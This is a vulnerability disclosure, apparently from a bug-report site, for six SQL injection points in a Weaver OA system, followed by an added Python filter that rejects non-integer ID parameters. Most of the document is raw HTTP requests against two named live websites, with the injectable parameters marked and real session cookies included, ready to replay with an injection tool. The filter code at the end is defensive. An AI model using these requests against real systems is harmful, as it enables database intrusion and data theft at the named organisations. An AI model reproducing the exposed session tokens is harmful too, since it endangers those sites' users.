A bundle of general SQL injection vulnerabilities in a Weaver system (full version)
Tested websites: http://gl.triolion.com/ and http://oaf.yitoa.com:6688/
The version information is as follows:
Note: The following examples show that two SQL injections are general-purpose.
SQL injection vulnerabilities (6 in total)
1 # injection point 1
GET /homepage/Homepage.jsp?hpid=4*&subCompanyId=1&isfromportal=1&isfromhp=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/wui/main.jsp?templateId=1
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
The same injection point also exists on another site:
GET /homepage/Homepage.jsp?hpid=21&subCompanyId=21&isfromhp=1&isfromportal=0&hastemplate= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://oaf.yitoa.com:6688/leftFrame.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: oaf.yitoa.com:6688
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4
2 # injection point 2
GET /page/element/7/News.jsp?ebaseid=7&eid=17*&styleid=1&hpid=4&subCompanyId=1&e71415018052369= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
The same injection point also exists on another site:
GET //page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template&hpid=21&subCompanyId=21 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: oaf.yitoa.com:6688
DNT: 1
Proxy-Connection: Keep-Alive
Cookie: loginfileweaver=/login/Login.jsp?logintype=1&gopage=; loginidweaver=1991; languageidweaver=7; iLeftMenuFrameWidth=134; testBanCookie=test; JSESSIONID=aZiM9tRkAEe4
3 # injection point 3
GET /CRM/data/ViewCustomerBase.jsp?requestid=-1*&isrequest=&CustomerID=11613 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/CRM/data/ViewCustomer.jsp?CustomerID=11613*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
4 # injection point 4
POST /page/element/compatible/view.jsp?ebaseid=9&eid=23*&styleid=1&hpid=4&subCompanyId=1&e71415018052423= HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Content-Length: 0
Accept: */*
Origin: http://gl.triolion.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
5 # injection point 5
GET /page/element/Weather/View.jsp?ebaseid=weather&eid=5*&styleid=1'&hpid=4'&subCompanyId=1'&e71415018052415=' HTTP/1.1
Host: gl.triolion.com
Proxy-Connection: keep-alive
Accept: text/html, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://gl.triolion.com/homepage/Homepage.jsp?hpid=4&subCompanyId=1&isfromportal=1&isfromhp=0&e71415018049673=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: testBanCookie=test; JSESSIONID=abc6T3nPyo20XcS2pP1Lu; loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7
6 # injection point 6
GET /proj/data/ViewProject.jsp?ProjID=56* HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gl.triolion.com/proj/search/searchtask.jsp?e71415500119375=
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
DNT: 1
Host: gl.triolion.com
Cookie: loginfileweaver=%2Flogin%2FLogin.jsp%3Flogintype%3D1%26gopage%3D; loginidweaver=489; languageidweaver=7; JSESSIONID=abckV1LU3qY1X8kdctsMu; testBanCookie=test
Solution:
Filter
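One way to apply the "Filter" fix to the six parameters marked above, as an added example that is not code from this advisory or from the vendor. It assumes each marked parameter is an integer record ID; the names `ID_PARAMS`, `check_request` and `audit` are hypothetical, and the sample targets are constructed from the request lines on this page.

```python
import re
from urllib.parse import parse_qs

# Lower-cased path -> parameter marked with "*" in the six requests above.
# Assumption: each of these parameters is an integer record ID.
ID_PARAMS = {
    "/homepage/homepage.jsp": "hpid",
    "/page/element/7/news.jsp": "eid",
    "/crm/data/viewcustomerbase.jsp": "requestid",
    "/page/element/compatible/view.jsp": "eid",
    "/page/element/weather/view.jsp": "eid",
    "/proj/data/viewproject.jsp": "ProjID",
}
INT_RE = re.compile(r"-?\d{1,10}")  # requestid=-1 appears as a base value above

def check_request(target):
    """Return (allowed, reason) for a request target (path plus query string)."""
    # Split by hand: urlsplit() would read the "//page/..." form as a host name.
    path, _, query = target.partition("?")
    # Collapse repeated slashes and ignore case so a re-spelled path hits the same rule.
    path = re.sub(r"/{2,}", "/", path).lower()
    param = ID_PARAMS.get(path)
    if param is None:
        return True, "path not covered"
    # parse_qs percent-decodes, so 56%27 is checked as 56'
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    if len(values) > 1:
        return False, f"{param}: repeated parameter"
    if values and not INT_RE.fullmatch(values[0]):
        return False, f"{param}: non-integer value {values[0]!r}"
    return True, "ok"

def audit(targets):
    """Return the targets that the filter would reject."""
    return [t for t in targets if not check_request(t)[0]]

# Constructed sample: this page's request lines with shortened query strings.
SAMPLE = [
    "/homepage/Homepage.jsp?hpid=4&subCompanyId=1",
    "/homepage/Homepage.jsp?hpid=4*&subCompanyId=1",
    "//page/element/7/News.jsp?ebaseid=7&eid=184*&styleid=template",
    "/CRM/data/ViewCustomerBase.jsp?requestid=-1&CustomerID=11613",
    "/proj/data/ViewProject.jsp?ProjID=56%27",
    "/proj/data/ViewProject.jsp?ProjID=56&ProjID=56*",
]

if __name__ == "__main__":
    for t in SAMPLE:
        print(check_request(t), t)
```

In the JSP code itself the same integer check belongs before the query is built, together with bound parameters (`PreparedStatement`) instead of string concatenation.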